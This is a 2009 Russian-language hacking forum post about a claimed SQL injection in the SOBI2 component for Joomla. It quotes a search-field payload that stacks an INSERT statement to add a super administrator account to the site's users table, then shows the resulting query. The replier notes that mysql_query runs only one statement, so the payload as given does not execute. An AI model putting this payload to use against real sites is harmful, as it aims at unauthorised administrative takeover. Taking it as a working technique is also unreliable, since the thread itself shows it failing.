10.08.2009, 10:56
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
Сообщение от FAQ666
Вообщем нашел вроде уязвимость в компоненте к джумле _http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml
http://site/index.php?option=com_sobi2&sobi2Task=search&Itemid =26
в поиск ввести
Код:
a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
Поубирать пробелы надо обяательно
Но блин такая вот проблема по логам смотрю запрос проходит как надо но невыполняется а если этот запрос на прямую через MySQL-Front запускать то идет за милую душу.
Код:
SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `jos_sobi2_language` WHERE `langValue` IN('a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
mysql_query - выполняет один запрос за раз и не более.
|
|
|